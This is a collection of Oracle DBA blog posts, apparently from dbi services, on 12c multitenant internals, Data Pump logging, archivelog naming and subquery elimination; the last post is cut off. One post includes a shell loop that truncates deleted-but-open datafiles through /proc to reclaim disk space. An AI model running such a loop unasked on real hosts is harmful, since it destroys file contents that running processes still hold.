FETCH #140650295606992:c=0,e=35,p=0,cr=4,cu=0,mis=0,r=1,dep=2,og=4,plh=813480514,tim=5178882057
CLOSE #140650295606992:c=0,e=12,dep=2,type=3,tim=5178882104

That was my point about metadata links. But now about modifications.

As I need to see only the statements, I can use TKPROF to get them aggregated, but then the container switch – like (CDB$ROOT(1)) here – is ignored.

Here is a small AWK script I use to add the Container ID to the SQL ID so that it is visible and detailed into TKPROF output:

awk '/^[*]{3}/{con=$3}/^PARSING IN/{sub(/sqlid=./,"&"con" ")}{print > "con_"FILENAME }'

Then I run TKPROF on the resulting file, with ‘sort=(execu)’ so that I have the modifications (insert/delete/update) first. The result starts with something like this:

SQL ID: (PDB1(3)) 1gfaj4z5hn1kf Plan Hash: 1110520934
 
delete from dependency$
where
d_obj#=:1

I know that dependencies are replicated into all containers (because table metadata is replicated into all containers) so I see following tables modified in the PDB: DEPENDENCY$, ACCESS$, DIANA_VERSION$, and of course OBJ$.

But to answer the initial question, there are no modifications done in the CDB$ROOT. Only SELECT statements there, on SOURCE$, SETTINGS$, CODEAUTH$, WARNING_SETTINGS$

So, probably, the updates have been transformed to no-op operations once the session is aware that the source is the same (same signature) and it just reads the compilation status.

Just as a comparison, tracing the same compilation when done on the CDB$ROOT will show inserts/delete/update on ARGUMENT$, PROCEDUREINFO$, SETTINGS$, PROCEDUREPLSQL$, IDL_UB1$, IDL_SB4$, IDL_UB2$, IDL_CHAR$, … all those tables sorting the compiled code.

So basically, when running DDL on metadata links in a PDB, not all the work is done in the CDB, especially not writing again what is already there (because you always upgrade the CDB$ROOT first). However, up to 12.2 we don’t see a big difference in time. This should change in 18c where the set of DDL to be run on the PDB will be pre-processed to avoid unnecessary operations.

 

Cet article 12c Multitenant Internals: compiling system package from PDB est apparu en premier sur Blog dbi services.

impdp logtime=all metrics=y and 12cR2 parallel metadata

$
0
0

A quick post to show why you should always use LOGTIME=ALL METRICS=Y when using Data Pump. Just look at an example showing the timestamp in front of each line and a message about each task completed by the worker:

15-NOV-17 11:48:32.305: W-5 Processing object type DATABASE_EXPORT/SCHEMA/PROCACT_SCHEMA
15-NOV-17 11:48:34.439: W-13 Completed 28 PROCACT_SCHEMA objects in 1 seconds
15-NOV-17 11:48:34.439: W-13 Completed by worker 1 28 PROCACT_SCHEMA objects in 1 seconds
15-NOV-17 11:48:34.440: W-13 Processing object type DATABASE_EXPORT/SCHEMA/TABLE/TABLE
15-NOV-17 11:48:35.472: W-17 Startup took 70 seconds
15-NOV-17 11:48:35.596: W-18 Startup took 70 seconds
15-NOV-17 11:48:35.719: W-20 Startup took 70 seconds
15-NOV-17 11:48:35.841: W-19 Startup took 70 seconds
15-NOV-17 11:48:43.520: W-5 Completed 1714 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 1 39 TABLE objects in 2 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 2 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 3 85 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 4 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 5 25 TABLE objects in 1 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 6 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 7 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 8 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 9 89 TABLE objects in 5 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 10 74 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 11 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 12 113 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 13 34 TABLE objects in 2 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 14 111 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 15 108 TABLE objects in 7 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 16 90 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 17 82 TABLE objects in 4 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 18 40 TABLE objects in 3 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 19 97 TABLE objects in 6 seconds
15-NOV-17 11:48:43.520: W-5 Completed by worker 20 53 TABLE objects in 3 seconds
15-NOV-17 11:48:44.266: W-1 Processing object type DATABASE_EXPORT/SCHEMA/TABLE/TABLE_DATA

Here, I was running an import with PARALLEL=20 and I can see exactly how many tables were processed by each worker. You see it is ‘TABLE’ and not ‘TABLE_DATA’ which is the proof that 12cR2 can import metadata in parallel.

I see no reason not to use LOGTIME=ALL METRICS=Y always and you will be happy to have this detail if something goes wrong.

 

Cet article impdp logtime=all metrics=y and 12cR2 parallel metadata est apparu en premier sur Blog dbi services.

Naming of archivelog files with non existing top level archivelog directory

$
0
0

In Oracle 12.2 an archive log directory is accepted, if top level directory does not exist:

oracle@localhost:/u01/app/oracle/product/12.2.0/dbhome_1/dbs/ [DMK] ls -l /u02/oradata/DMK/
 total 2267920
 drwxr-xr-x. 2 oracle dba        96 Dec  6 05:36 arch ...

Now database accepts this non existing archivelog destination:

SQL> alter system set log_archive_dest_3='LOCATION=/u02/oradata/DMK/arch/arch2';
System altered.

But not this:

SQL> alter system set log_archive_dest_4='LOCATION=/u02/oradata/DMK/arch/arch2/arch4';
 alter system set log_archive_dest_4='LOCATION=/u02/oradata/DMK/arch/arch2/arch4'
 *
 ERROR at line 1:
 ORA-02097: parameter cannot be modified because specified value is invalid
 ORA-16032: parameter LOG_ARCHIVE_DEST_4 destination string cannot be translated
 ORA-07286: sksagdi: cannot obtain device information.
 Linux-x86_64 Error: 2: No such file or directory

Log file format is set as following:

SQL> show parameter log_archive_format;
NAME                                 TYPE        VALUE
 ------------------------------------ ----------- ------------------------------
 log_archive_format                   string      %t_%s_%r.dbf
 SQL>

 

Now let’s see how archive log files look like in log_archive_dest_3:

oracle@localhost:/u01/app/oracle/product/12.2.0/dbhome_1/dbs/ [DMK] ls -l /u02/oradata/DMK/arch/arch2*
 -rw-r-----. 1 oracle dba 3845120 Dec  6 05:36 /u02/oradata/DMK/arch/arch21_5_960106002.dbf

So Oracle just adds the non existing top level directory to beginning of archivelog filename.

 

Cet article Naming of archivelog files with non existing top level archivelog directory est apparu en premier sur Blog dbi services.

12cR2 Subquery Elimination

$
0
0

More and more we can see crazy queries generated by ORM frameworks or BI query generators. They are build to be easily generated rather than being optimal. Then, the optimizer has to implement more and more transformations to get an efficient execution plan. Here is one new that appeared in Oracle 12cR2: Subquery Elimination when the subquery do not filter any rows.

A semi-join is a join where we do not need to match with all rows, but only one. We write it with an EXISTS subquery or a =ANY or =SOME one, which is equivalent.

12.1

Here is the behaviour in 12.1.0.2 when the subquery do not filter any row because it reads the same table as the outer one, without any predicate:
SQL> select * from dbms_xplan.display_cursor(null,null,'allstats last +outline');
PLAN_TABLE_OUTPUT
-----------------
SQL_ID az1jcra46h5ua, child number 1
-------------------------------------
select * from EMP where ename in (select ename from EMP)
 
Plan hash value: 977554918
 
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 14 |00:00:00.01 | 13 | | | |
|* 1 | HASH JOIN SEMI | | 1 | 14 | 14 |00:00:00.01 | 13 | 1098K| 1098K| 889K (0)|
| 2 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 7 | | | |
| 3 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 6 | | | |
----------------------------------------------------------------------------------------------------------------

We read 2 times the same table, join all rows and finally return as result exacly the same rows as those coming from the first full scan. This is not efficient.

12.2

Here is the same query in 12.2 where we can see that the table is scanned only once because the optimizer knows that the subquery do not filter anything:

SQL> select * from dbms_xplan.display_cursor(null,null,'allstats last +outline');
PLAN_TABLE_OUTPUT
SQL_ID az1jcra46h5ua, child number 0
-------------------------------------
select * from EMP where ename in (select ename from EMP)
 
Plan hash value: 3956160932
 
------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 14 |00:00:00.01 | 9 |
|* 1 | TABLE ACCESS FULL| EMP | 1 | 14 | 14 |00:00:00.01 | 9 |
------------------------------------------------------------------------------------

This is mentioned in the outline hints with ELIMINATE_SQ:

Outline Data
-------------
 
/*+
BEGIN_OUTLINE_DATA
IGNORE_OPTIM_EMBEDDED_HINTS
OPTIMIZER_FEATURES_ENABLE('12.2.0.1')
DB_VERSION('12.2.0.1')
ALL_ROWS
OUTLINE_LEAF(@"SEL$D0DB0F9A")
ELIMINATE_SQ(@"SEL$2")
OUTLINE(@"SEL$1")
OUTLINE(@"SEL$2")
FULL(@"SEL$D0DB0F9A" "EMP"@"SEL$1")
END_OUTLINE_DATA
*/

This feature can be disabled with the following paramter:

SQL> alter session set "_optimizer_eliminate_subquery"=false;
Session altered.

Or with the following hint:

SQL> select * from EMP where ename in (select /*+ NO_ELIMINATE_SQ */ ename from EMP);

Finally here is what you can see in the CDB trace:

SQE: Trying SQ elimination.
SQE: Trying SQ elimination.
SQE: Query valid for SQ elimination:******* UNPARSED QUERY IS *******
SELECT "EMP"."EMPNO" "EMPNO","EMP"."ENAME" "ENAME","EMP"."JOB" "JOB","EMP"."MGR" "MGR","EMP"."HIREDATE" "HIREDATE","EMP"."SAL" "SAL","EMP"."COMM" "COMM","EMP"."DEPTNO" "DEPTNO" FROM "SCOTT"."EMP" "EMP" WHERE "EMP"."ENAME"=ANY (SELECT "EMP"."ENAME" "ENAME" FROM "SCOTT"."EMP" "EMP")
Registered qb: SEL$D0DB0F9A 0xe7035778 (SUBQUERY ELIMINATE SEL$1; SEL$2)
---------------------
QUERY BLOCK SIGNATURE
---------------------
signature (): qb_name=SEL$D0DB0F9A nbfros=1 flg=0
fro(0): flg=0 objn=73253 hint_alias="EMP"@"SEL$1"
 
SQE: Query after SQ elimination:******* UNPARSED QUERY IS *******
SELECT "EMP"."EMPNO" "EMPNO","EMP"."ENAME" "ENAME","EMP"."JOB" "JOB","EMP"."MGR" "MGR","EMP"."HIREDATE" "HIREDATE","EMP"."SAL" "SAL","EMP"."COMM" "COMM","EMP"."DEPTNO" "DEPTNO" FROM "SCOTT"."EMP" "EMP" WHERE 0=0 AND "EMP"."ENAME" IS NOT NULL

This example is simple and it is obvious that the SQL should be re-written. But with large generated queries, on complex views, this is the kind of thing that can be seen in the resulting query and this transformation will help to avoid unnecessary work.

 

Cet article 12cR2 Subquery Elimination est apparu en premier sur Blog dbi services.


Drop PDB including datafiles may keep files open

$
0
0

I like that Oracle drops the datafiles from the operating system when we remove them from the database (with drop tablespace or drop pluggable database) because I don’t like to have orphean files remaining in the filesystem. However, to ensure that space is reclaimed, we must be sure that Oracle did not leave a process with this file opened. Linux allows to drop an open file but then drops only the inode. The consequence is that we do not see the file, but space is not reclaimable until the process closes the handle.
Here is a case where I’ve had an issue in 12.2 where plugging a PDB is done in parallel and the parallel processes keep the files opened even if we drop the pluggable database.

I have 1.2 GB free on my filesystem:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 1.9G 1.2G 61% /

Plug

I plug a PDB from a PDB archvive:
SQL> create pluggable database PDB0
2 using '/u01/app/temp/PDB0.pdb'
3 file_name_convert=('/u01/app/temp','/u02/oradata')
4 /
 
Pluggable database PDB0 created.

Open

In my example the PDB was from an older PSU level. I open it:
SQL> alter pluggable database PDB0 open;
ORA-24344: success with compilation error
 
Pluggable database PDB0 altered.

I got a warning and the PDB is in restricted session mode:
SQL> show pdbs
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB0 READ WRITE YES
4 PDB1 READ WRITE NO

The reason is that a PSU installed in the CDB$ROOT was not there when the PDB was unplugged:

SQL> select status,message from pdb_plug_in_violations;
STATUS MESSAGE
------ ------------------------------------------------------------------------------------------------------------
PENDING DBRU bundle patch 171017 (DATABASE RELEASE UPDATE 12.2.0.1.171017): Installed in the CDB but not in the PDB.

I can run datapatch, but let’s say that I realize it’s the wrong PDB archive and I want to drop what I’ve imported. Then I expect to reclaim the space in order to be able to import the right one again.

Processes

Before closing the PDB here are all the processes having one of the datafiles opened:
SQL> host for i in $(fuser /u02/oradata/*) ; do ps --no-headers -p $i ; done
/u02/oradata/sysaux01.dbf:
/u02/oradata/system01.dbf:
/u02/oradata/temp01.dbf:
/u02/oradata/undotbs01.dbf:
/u02/oradata/users01.dbf:
6053 ? 00:00:00 ora_dbw0_cdb1
6122 ? 00:00:01 ora_p003_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6120 ? 00:00:01 ora_p002_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6118 ? 00:00:00 ora_p001_cdb1
6594 ? 00:00:01 oracle_6594_cdb
6053 ? 00:00:00 ora_dbw0_cdb1
6116 ? 00:00:00 ora_p000_cdb1
6594 ? 00:00:01 oracle_6594_cdb

There is my session shadow process, also the DBWR, and the Pnnn parallel processes who did the copy of the datafiles during the plug.

Close

So, I want to drop it and then I close it:
SQL> alter pluggable database PDB0 close;
 
Pluggable database PDB0 altered.

Close means that all files are closed. Is it true? Actually not:
SQL> host for i in $(fuser /u02/oradata/*) ; do ps --no-headers -p $i ; done
/u02/oradata/sysaux01.dbf:
/u02/oradata/system01.dbf:
/u02/oradata/undotbs01.dbf:
/u02/oradata/users01.dbf:
6122 ? 00:00:01 ora_p003_cdb1
6120 ? 00:00:01 ora_p002_cdb1
6118 ? 00:00:00 ora_p001_cdb1
6116 ? 00:00:00 ora_p000_cdb1

The parallel processes still have the datafiles opened. This is probably a bug and I’ll open a SR referencing this blog post.

So I want to reclaim space:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 2.6G 527M 84% /

I expect to have this 527 MB available go back to 1.2 GB available once I drop the PDB.

Drop including datafiles

I cannot drop the PDB and keep the datafiles, or I’ll get ORA-65179: cannot keep datafiles for a pluggable database that is not unplugged
I don’t want to unplug it but just to drop it, then I must mention the ‘including datafiles':

SQL> drop pluggable database PDB0 including datafiles;
 
Pluggable database PDB0 dropped.

Unfortunately, the space is not reclaimed:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 2.6G 527M 84% /

As you have seen that the Pnnn processes were still there after the close, you know the reason. Linux has removed the inode but the file is still there in the filesystem until the processes close the handles (or the processes are killed). You can see them with lsof or from the /proc filesystem:

SQL> host find /proc/*/fd -ls 2>/dev/null | grep deleted
79174 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6116/fd/257 -> /u02/oradata/users01.dbf\ (deleted)
79195 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6118/fd/257 -> /u02/oradata/undotbs01.dbf\ (deleted)
79216 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6120/fd/257 -> /u02/oradata/system01.dbf\ (deleted)
79237 0 lrwx------ 1 oracle oinstall 64 Dec 25 21:20 /proc/6122/fd/257 -> /u02/oradata/sysaux01.dbf\ (deleted)

On a running CDB I cannot kill the background processes because they may be doing something useful. Until I can re-start the instance, the only way to reclaim the space is to write an empty file to replace those files. I cannot use the file name which has been deleted but I can use the /proc link:

SQL> host find /proc/*/fd -ls 2>/dev/null | grep -E " [/]u02[/]oradata[/].* [(]deleted[)]" | awk '{print $11}' | while read f ; do : > $f ; done

And finally space is reclaimed:
SQL> host df -h /u02/oradata
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ol-root 3.1G 1.9G 1.2G 61% /

So what?

I encountered this issue with a PDB plug but I’m quite sure we can encounter it in other situations when the parallel processes had opened the PDB datafiles. You can imagine the consequence on a multitenant CDB for DBaaS where you have hundreds of PDBs and constantly create and drop them, probably in an automated way. Space not reclaimed means that at one time the provisioning will fail. I hope this bug will be filled and fixed. Closing a PDB should take care that all processes close the files. The safe way is to include something like I did, emptying the deleted files, with the proper verifications that the old files belong to a dropped PDB.

 

Cet article Drop PDB including datafiles may keep files open est apparu en premier sur Blog dbi services.

12c Multitenant internals: PDB replay DDL for common users

$
0
0

In multitenant, you can create common Users, Roles, and Profiles. You create them in CDB$ROOT, with the CONTAINER=ALL clause (which is optional because it is the only possible value when connected to CDB$ROOT) but they are visible to all containers. As the goal of multitenant is to avoid to duplicate common metadata to all containers, You may think that they are visible through those magic metadata links. But that’s actually wrong: they are simply replicated with a very simple mechanism: the DDL for common objects is replayed into each user PDB.

I’m connected to CDB2’s CDB$ROOT and I have two pluggable databases:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 MOUNTED

PDB1 is opened and PDB2 is closed.

PDB_SYNC$

In this example, I’ll query PDB_SYNC$ which is the table where Oracle stores all DDL for common users, roles, or profiles in order to be able to replay it later:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

I excluded the bitand(flags,8)=8 because it concerns application containers. I query with the container() to show the con_id but this is for con_id=1 which is the CDB$ROOT.

You can see some DDL for CTXSYS recorded on January 26th which is the day where this release (12.2.0.1) was built. I used a template with datafiles to create the CDB with DBCA. And you see some DDL to unlock SYS and SYSTEM on December 23rd when I created the database. You can also see that they are ordeded in sequence with REPLAY#.

More interesting is the OPCODE=-1 which is PDB$LASTREPLAY and looks like the last value of REPLAY#. This means that on this container, CDB$ROOT, all statements where REPLAY#<=5 was run.

With a similar query, I query the opened PDBs:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

There only one row here in CON_ID=3, which is PDB1: the PDB$LASTREPLAY mentioning that all statements up to REPLAY=5 have been run also in this container.
I don’t see PDB2 (CON_ID=4) here because the container() clause cannot query closed containers.

CONTAINER=ALL DDL

I’ll run some common DLL to create a profile, a role and a user:

SQL> create profile C##PROFILE1 limit inactive_account_time 15 container=all;
Profile C##PROFILE1 created.
 
SQL> create role C##ROLE1 container=all;
Role C##ROLE1 created.
 
SQL> create user C##USER1 identified by oracle container=all;
User C##USER1 created.
 
SQL> alter user C##USER1 profile C##PROFILE1;
User C##USER1 altered.
 
SQL> grant C##ROLE1 to C##USER1 container=all;
Grant succeeded.

The C## prefix is mandatory to isolate the common user namespace. You can change it with the common_prefix parameter. You can even set it to the empty string, but then you have a risk of namespace collision when you plug a PDB between CDB having different common profiles or roles.
The CONTAINER=ALL is the default and the only possibility when connected to CDB$ROOT so it is optional. I recommend to mention it explicitly in order to avoid problems when running the same DDL in CDB$ROOT and in PDBs.

All those DDL have been recorded into PDB_SYNC$ and the REPLAY# has been increased:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 1466615 29-dec-17 09:26:56 C##PROFILE1 SYS 7 6 create profile C##PROFILE1 limit inactive_account_time 15 container=all^@
1 0 1466641 29-dec-17 09:26:57 C##ROLE1 SYS 3 7 create role C##ROLE1 container=all^@
1 0 1466748 29-dec-17 09:26:58 C##USER1 SYS 1 8 create user C##USER1 identified by * container=all^@
1 0 1466812 29-dec-17 09:26:59 C##USER1 SYS 5 9 alter user C##USER1 profile C##PROFILE1^@
1 0 1466853 29-dec-17 09:26:59 C##USER1 C##ROLE1 SYS 10 10 grant C##ROLE1 to C##USER1 container=all^@
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

PDB1 (CON_ID=3) was opened read write, and then has been synchronized (the DDL has been run in the container to create the same profile, role and user) and the PDB$LASTREPLAY has been updated in this container to show that all has been done:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
%nbsp;
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

MOUNTED or READ ONLY

I open the PDB2 read only because I want to see what is in PDB_SYNC$ there. But READ ONLY means that the DDL cannot be run because no write is allowed in the local dictionary.

SQL> alter pluggable database PDB2 open read only;
Pluggable database PDB2 altered.

Running the same query as above, I can see that PDB2 (CON_ID=4) is synchronized only up to the statements with REPLAY#=5 because my DDL was not replicated there.
SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 5

Sync at OPEN

When I open PDB2 in read write mode, the DDL can be synchronized:

SQL> alter pluggable database PDB2 open read write force;
Pluggable database PDB2 altered.

At open, the DDL from REPLAY#>5 has been replayed and once opened the PDB is in sync with CDB$ROOT:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,opcode,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

So what?

The common users, roles and profiles are not stored only in CDB$ROOT to be shared, but rather replicated to all PDBs. The DDL is replicated synchronously to all opened pluggable databases in read write, and stored into the CDB$ROOT PDB_SYNC$ table to be replayed later when non-synced PDBs are opened. I’ll show in the next post what happens when the DDL is in error.

Note that even when all pluggable databases are opened read write, the DDL is stored and they are purged later (when replayed on all PDBs) because they are needed when you create a new PDB and open it. The PDB$SEED has REPLAY#=0 for PDB$LASTREPLAY which means that all statements will be replayed.

This is 12.2.0.1 where this mechanism is only for common users, roles and profiles having DDL in CDB$ROOT. With application containers, more than that is recorded: all DML and DDL run between the ‘begin install/upgrade/patch’ and ‘end install/upgrade/patch’ in the application root. Then, the statements can be replayed into the application PDB with a simple SYNC command. In the future release (18c) we expect to have that application root behavior ported to CDB$ROOT so that we don’t have to run catupgrd.sql in all containers. Then the PDB will probably be patched or upgraded when opened.

 

Cet article 12c Multitenant internals: PDB replay DDL for common users est apparu en premier sur Blog dbi services.

12c Multitenant internals: PDB_PLUG_IN_VIOLATIONS

$
0
0

In the previous post https://blog.dbi-services.com/12c-multitenant-internals-pdb-replay-ddl-for-common-users I’ve done some DDL on a common user to show how this is replayed later for PDBs that were not opened at that time. But what happens when one of the DDL fails on one PDB?

PDB$LASTREPLAY

In the last post, the C##USER1 common user was created and all pluggable databases (PDB1 with con_id=3 and PDB2 with con_id=4) were opened and synchronized:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where opcode=-1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

When REPLAY# in the PDB is equal to the CDB$ROOT one, this means that there are no additional statements to replicate on the PDB.

I have PDB1 opened read write and PDB2 in read only:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ ONLY NO

For the demo my user’s default tablespace is SYSTEM:

SQL> select con_id,username,common,default_tablespace from cdb_users where username='C##USER1' order by 1;
 
CON_ID USERNAME COMMON DEFAULT_TABLESPACE
------ -------- ------ ------------------
1 C##USER1 YES SYSTEM
3 C##USER1 YES SYSTEM
4 C##USER1 YES SYSTEM

Failure in opened containers

I want to change the default tablespace for C##USER1 and I have a USERS tablespace in CDB$ROOT (but not in the PDBs):

SQL> alter user C##USER1 default tablespace USERS;
 
Error starting at line : 50 File @ common-users-pdb-sync.sql
In command -
alter user C##USER1 default tablespace USERS
Error report -
ORA-65048: error encountered when processing the current DDL statement in pluggable database PDB1
ORA-00959: tablespace 'USERS' does not exist

As we have seen in the last post, the DDL is executed on all containers that are opened read write. Here it is fine on CDB$ROOT but fails on PDB1.

Then I create the USERS tablespace in PDB1:

SQL> alter session set container=PDB1;
Session altered.
SQL> create tablespace USERS datafile '/u01/oradata/CDB2/PDB1/users.dbf' size 5M;
Tablespace USERS created.
SQL> alter session set container=CDB$ROOT;
Session altered.

And now, the statement is successful in CDB$ROOT, replicated on PDB1:

SQL> alter user C##USER1 default tablespace USERS;
User C##USER1 altered.

This is nice: the statement is successful in all containers or fails. When it is successful, statements are recorded in PDB_SYNC$:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 1466615 29-dec-17 09:26:56 C##PROFILE1 SYS 7 6 create profile C##PROFILE1 limit inactive_account_time 15 container=all^@
1 0 1466641 29-dec-17 09:26:57 C##ROLE1 SYS 3 7 create role C##ROLE1 container=all^@
1 0 1466748 29-dec-17 09:26:58 C##USER1 SYS 1 8 create user C##USER1 identified by * container=all^@
1 0 1466812 29-dec-17 09:26:59 C##USER1 SYS 5 9 alter user C##USER1 profile C##PROFILE1^@
1 0 1466853 29-dec-17 09:26:59 C##USER1 C##ROLE1 SYS 10 10 grant C##ROLE1 to C##USER1 container=all^@
1 0 1467010 29-dec-17 09:27:01 C##USER1 SYS 5 11 alter user C##USER1 default tablespace USERS^@

Failure in replay at open for closed containers

But PDB2 is not synchronized because it was not opened read write:

